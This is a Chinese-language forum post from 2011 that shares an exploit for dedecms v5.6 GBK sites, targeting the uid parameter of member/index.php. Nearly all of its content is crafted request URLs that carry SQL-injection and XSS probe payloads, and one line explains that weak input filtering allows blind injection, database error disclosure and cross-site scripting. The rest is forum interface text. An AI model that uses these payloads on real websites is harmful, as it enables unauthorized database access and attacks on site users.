[服务器安全] dedecms v5.6 GBK 注入漏洞利用(member/index.php)

5 主题	0 回帖	0 积分

热心网友

金币: 0
阅读权限: 220
精华: 0
威望: 0
贡献: 0
在线时间: 0 小时
注册时间: 2009-9-28

发消息

发表于 2011-8-19 10:29:38 | 显示全部楼层 |阅读模式

EXP:
htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7';
会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS
EXP:
htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7';

htp://127.0.0.1/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe'")/>

htp://127.0.0.1/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'">

使用道具举报

返回列表发新帖

[服务器安全] dedecms v5.6 GBK 注入漏洞利用(member/index.php)

浏览过的版块